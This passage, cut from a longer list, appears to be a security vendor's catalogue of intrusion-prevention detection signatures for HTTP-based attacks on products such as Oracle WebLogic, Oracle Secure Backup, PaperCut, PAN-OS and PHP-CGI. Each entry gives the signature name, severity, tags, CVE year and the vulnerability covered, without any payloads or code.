Tags: Any Operating System, Any Hardware, Oracle Application Server Portal, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Oracle-Application-Server-Portal-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Oracle-Application-Server-Reports-Arbitrary-System-Command-Execution

About this situation: An attempt to exploit a vulnerability in Oracle Application Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Developer Suite, Oracle Application Server, CVE2005, Any Operating System not specific, Oracle Application Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Oracle-Application-Server-Reports-Arbitrary-System-Command-Execution
Description:
Back to top

HTTP_CSU-Oracle-Application-Server-XSS

About this situation: Attempt to exploit XSS vulnerability in Oracle Application Server
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Application Server, CVE2008, Any Operating System not specific, Oracle Application Server not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Oracle-Application-Server-XSS
Description:
Back to top

HTTP_CSU-Oracle-Application-Testing-Suite-Reportname-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle Application Testing Suite detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Application Testing Suite, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-1344-5242
Vulnerability: Oracle-Application-Testing-Suite-Reportname-Directory-Traversal
Description:
Back to top

HTTP_CSU-Oracle-Bea-WebLogic-Server-Console-help.portal-XSS

About this situation: Detected an attempt to exploit a vulnerability in BEA Systems WebLogic Server
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle BEA WebLogic, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Oracle-Bea-WebLogic-Server-Console-help.portal-XSS
Description:
Back to top

HTTP_CSU-Oracle-Bea-WebLogic-URL-String-BOF

About this situation: An excessively long version field in HTTP request to Oracle BEA WebLogic detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle BEA WebLogic, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-558-5211
Vulnerability: Oracle-Bea-WebLogic-Server-Apache-Connector-HTTP-Version-String-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Oracle-BeeHive-Voice-Servlet

About this situation: An attempt to exploit an Oracle BeeHive Voice-Servlet vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle BeeHive, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-1639-5242
Vulnerability: Oracle-BeeHive-Voice-Servlet
Description:
Back to top

HTTP_CSU-Oracle-BPEL-Process-Manager-Scriptservlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Oracle BPEL Process Manager detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle BPEL Process Manager, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Oracle-BPEL-Process-Manager-Scriptservlet-Information-Disclosure
Description:
Back to top

HTTP_CSU-Oracle-Business-Intelligence-Enterprise-Edition-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence Enterprise Edition detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Oracle-Business-Intelligence-Enterprise-Edition-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Oracle-Business-Intelligence-Mobile-App-Designer-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence Mobile App Designer detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Mobile App Designer, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Oracle-Business-Intelligence-Mobile-App-Designer-Information-Disclosure
Description:
Back to top

HTTP_CSU-Oracle-Demantra-Demand-Management-Information-Leak

About this situation: An attempt to exploit a Oracle Demantra Demand Management Information Leak vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Demantra Demand Management, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1640-5242
Vulnerability: Oracle-Demantra-Demand-Management-Information-Leak
Oracle-Demantra-Demand-Management-File-Download
Description:
Back to top

HTTP_CSU-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2856-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2856-XSS
Description:
Back to top

HTTP_CSU-Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2189-Infinite-Loop

About this situation: An attempt to exploit a vulnerability in Oracle E-Business Suite detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle E-Business Suite, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Vulnerability: Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2189-Infinite-Loop
Description:
Back to top

HTTP_CSU-Oracle-Fusion-Middleware-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Oracle Fusion Middleware detected.
Context: HTTP Request URI
Severity: 2
Tags: Windows, Linux, Any Hardware, Oracle Fusion Middleware, CVE2012, Windows not specific, Linux not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-660-5211
Vulnerability: Oracle-Fusion-Middleware-Information-Disclosure
Description:
Back to top

HTTP_CSU-Oracle-GlassFish-Server-Themeservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Oracle GlassFish Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle GlassFish Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Oracle-GlassFish-Server-Themeservlet-Directory-Traversal
Description:
Back to top

HTTP_CSU-Oracle-HTTP-Server-Mod-Access-Restriction-Bypass

About this situation: Possible attempt to bypass OHS access restrictions via the Oracle web cache
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Application Server, CVE2005, Any Operating System not specific, Oracle Application Server not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1784-5242
Vulnerability: Oracle-HTTP-Server-Mod-Access-Restriction-Bypass
Description:
Back to top

HTTP_CSU-Oracle-HTTP-Server-Mod-Access-Restriction-Bypass-2

About this situation: Possible attempt to bypass OHS access restrictions via the Oracle web cache
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Application Server, CVE2005, Any Operating System not specific, Oracle Application Server not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Vulnerability: Oracle-HTTP-Server-Mod-Access-Restriction-Bypass
Description:
Back to top

HTTP_CSU-Oracle-Iplanet-Web-Server-Information-Disclosure-Attack

About this situation: An attempt to exploit a vulnerability in Oracle iPlanet Web Server detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle iPlanet Web Server, CVE2020, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Vulnerability: Oracle-Iplanet-Web-Server-Information-Disclosure-Attack
Description:
Back to top

HTTP_CSU-Oracle-Java-Runtime-Environment-Insecure-File-Loading

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Oracle-Java-Runtime-Environment-Insecure-File-Loading
Description:
Back to top

HTTP_CSU-Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Oracle JDeveloper detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle JDeveloper, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1487-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization
Description:
Back to top

HTTP_CSU-Oracle-Opera-Remote-Code-Execution-CVE-2023-21932

About this situation: An attempt to exploit a vulnerability in Oracle Opera detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Opera, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1582-5242
Last changed: sgpkg-ips-1583-5242
Vulnerability: Oracle-Opera-Remote-Code-Execution-CVE-2023-21932
Description:
Back to top

HTTP_CSU-Oracle-Oss-Support-Tools-Diagnostic-Assistant-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Oracle OSS Support Tools detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle OSS Support Tools, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: Oracle-Oss-Support-Tools-Diagnostic-Assistant-External-Entity-Injection
Description:
Back to top

HTTP_CSU-Oracle-Potential-Vulnerability-Probe-Request

About this situation: Potential vulnerability probe of an Oracle server
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, CVE2005, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-1784-5242
Vulnerability: Oracle-HTTP-Server-Mod-Access-Restriction-Bypass
HTTP-Oracle-Suspected-Probe
Description:
Back to top

HTTP_CSU-Oracle-Reports-Service-File-Overwrite

About this situation: File overwrite attempt using vulnerability in the Oracle Reports Service
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Developer Suite, Oracle Application Server, CVE2005, Any Operating System not specific, Oracle Application Server not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1639-5242
Vulnerability: Oracle-Reports-Service-File-Overwrite
Description:
Back to top

HTTP_CSU-Oracle-Secure-Backup-Administration-Preauth-Variable-Command-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Secure Backup detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Oracle-Secure-Backup-Administration-Preauth-Variable-Command-Injection
Description:
Back to top

HTTP_CSU-Oracle-Secure-Backup-Administration-Validate_Login-Command-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Secure Backup detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Oracle-Secure-Backup-Administration-Validate_Login-Command-Injection
Description:
Back to top

HTTP_CSU-Oracle-Secure-Backup-Objectname-Variable-Command-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Secure Backup detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Backup, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-381-4219
Vulnerability: Oracle-Secure-Backup-Objectname-Variable-Command-Injection
Description:
Back to top

HTTP_CSU-Oracle-Secure-Enterprise-Search-Parameter-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Oracle Secure Enterprise Search detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Secure Enterprise Search, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Oracle-Secure-Enterprise-Search-Parameter-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Oracle-TimesTen-Format-Strings-Vulnerability-2

About this situation: Attempt to exploit format strings vulnerability in Oracle TimesTen
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle TimesTen, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-559-5211
Vulnerability: Oracle-TimesTen-Evtdump-Format-Strings-Vulnerability
Description:
Back to top

HTTP_CSU-Oracle-TimesTen-In-Memory-Database-HTTP-Request-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Oracle TimesTen In-Memory Database detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle TimesTen, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-649-5211
Vulnerability: Oracle-TimesTen-In-Memory-Database-HTTP-Request-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Oracle-WebLogic-Remote-Diagnosis-Assistant-Rda_tfa_Ref_Date-Command-Injection

About this situation: An attempt to exploit a vulnerability in Oracle Diagnosis Assistant detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Diagnosis Assistant, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Oracle-WebLogic-Remote-Diagnosis-Assistant-Rda_tfa_Ref_Date-Command-Injection
Description:
Back to top

HTTP_CSU-Oracle-WebLogic-Server-Local-File-Inclusion-CVE-2022-21371

About this situation: An attempt to exploit a vulnerability in Oracle WebLogic Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebLogic Server, CVE2022, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Oracle-WebLogic-Server-Local-File-Inclusion-CVE-2022-21371
Description:
Back to top

HTTP_CSU-Oracle-XSQLConfig.xml-Information-Disclosure

About this situation: Information disclosure in Oracle 8i/9i
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle 8i, Oracle 9i, CVE2002, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Oracle-XSQLConfig.xml-Information-Disclosure-Vulnerability
Description:
Back to top

HTTP_CSU-Oracle9i-Source-Code-Disclosure

About this situation: Source code disclosure in Oracle9i
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle 9i, CVE2002, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Oracle9i-Source-Code-Disclosure-Vulnerability
Description:
Back to top

HTTP_CSU-osCommerce-Response-Splitting

About this situation: HTTP response splitting attempt against osCommerce
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, osCommerce, CVE2005, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-osCommerce-Response-Splitting
Description:
Back to top

HTTP_CSU-Owncloud-Information-Disclosure-CVE-2023-49103

About this situation: An attempt to exploit a vulnerability in ownCloud detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ownCloud, CVE2023, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1659-5242
Vulnerability: Owncloud-Information-Disclosure-CVE-2023-49103
Description:
Back to top

HTTP_CSU-Palo-Alto-Expedition-Missing-Authentication-CVE-2024-5910

About this situation: An attempt to exploit a vulnerability in Palo Alto Expedition detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Palo Alto Expedition, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Vulnerability: Palo-Alto-Expedition-Missing-Authentication-CVE-2024-5910
Description:
Back to top

HTTP_CSU-Palo-Alto-PAN-OS-Authentication-Bypass-CVE-2025-0108

About this situation: An attempt to exploit a vulnerability in PAN-OS detected
Context: HTTP Request URI
Severity: 7
Tags: PAN-OS, Any Hardware, CVE2025, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Vulnerability: Palo-Alto-PAN-OS-Authentication-Bypass-CVE-2025-0108
Description:
Back to top

HTTP_CSU-Papercut-Fileuploadauthenticationfilter-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in PaperCut MF/NG detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PaperCut MF/NG, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Vulnerability: Papercut-Fileuploadauthenticationfilter-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Papercut-NG-And-MF-Messagecontroller-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in PaperCut MF detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PaperCut MF/NG, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Vulnerability: Papercut-NG-And-MF-Messagecontroller-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Papercut-WebDAV-Path-Traversal-CVE-2023-39143

About this situation: An attempt to exploit a vulnerability in PaperCut detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PaperCut MF/NG, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1831-5242
Last changed: sgpkg-ips-1831-5242
Vulnerability: Papercut-WebDAV-Path-Traversal-CVE-2023-39143
Description:
Back to top

HTTP_CSU-Parse-Server-literalizeRegexPart-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Parse Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Parse Server, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1712-5242
Last changed: sgpkg-ips-1712-5242
Vulnerability: Parse-Server-literalizeRegexPart-SQL-Injection
Description:
Back to top

HTTP_CSU-Path-Traversal-Sequence-In-File-Name

About this situation: An attempt to exploit a path traversal vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center UAM, CVE2012, CVE2014, CVE2018, CVE2019, CVE2021, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-1846-5242
Vulnerability: HP-Intelligent-Management-Center-Reporting-Information-Disclosure
HP-Intelligent-Management-Center-Uam-Acmservletdownload-Information-Disclosure
HP-Intelligent-Management-Center-BIMS-Uploadservlet-Information-Disclosure
Responsive-Filemanager-Ajax_calls.php-Information-Disclosure
Openemr-Ajax_Download.php-Directory-Traversal
DrayTek-Vigor-Local-File-Inclusion-CVE-2021-20124
Progress-WhatsUp-Gold-SnmpExtendedActiveMonitor-Directory-Traversal
Description:
Back to top

HTTP_CSU-PDGSoft-Shopping-Cart-Orders-Exposure

About this situation: Misconfiguration of the PDGSoft Shopping Cart program "shopper.cgi" detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PDGSoft Shopping Cart, CVE1999, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: PDGSoft-Shopping-Cart-Orders-Exposure
Description:
Back to top

HTTP_CSU-PeerCast-Request-Format-String

About this situation: Detected attempt to exploit a vulnerability in PeerCast
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PeerCast, CVE2005, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: PeerCast-Get-Request-Format-String
Description:
Back to top

HTTP_CSU-PeerCast-Stream-BOF

About this situation: An attempt to exploit a buffer overflow in PeerCast was detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PeerCast, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-689-5211
Vulnerability: PeerCast-Stream-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Pentaho-Business-Server-Auth-Bypass-And-Server-Side-Template-Injection-RCE

About this situation: An attempt to exploit a vulnerability in Pentaho Business Analytics Server detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, Pentaho Business Analytics Server, CVE2022, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Pentaho-Business-Server-Auth-Bypass-And-Server-Side-Template-Injection-RCE
Pentaho-Business-Server-Server-Side-Template-Injection-CVE-2022-43769
Description:
Back to top

HTTP_CSU-Php-Cgi-Query-String-Information-Disclosure

About this situation: An information disclosure vulnerability in PHP
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-452-4333
Last changed: sgpkg-ips-1639-5242
Vulnerability: Php-Cgi-Query-String-Information-Disclosure
Description:
Back to top

HTTP_CSU-Php-Cgi-Remote-Code-Execution-CVE-2024-4577

About this situation: An attempt to exploit a vulnerability in PHP detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, PHP, CVE2024, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1735-5242
Last changed: sgpkg-ips-1735-5242
Vulnerability: Php-Cgi-Remote-Code-Execution-CVE-2024-4577
Description:
Back to top

HTTP_CSU-Php-Chart-Wizards-Url-Remote-Code-Execution

About this situation: php-Chart wizard/url.php Remote Code Execution detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-537-5211
Vulnerability: Php-Chart-Wizards-Url-Remote-Code-Execution
Description:
Back to top

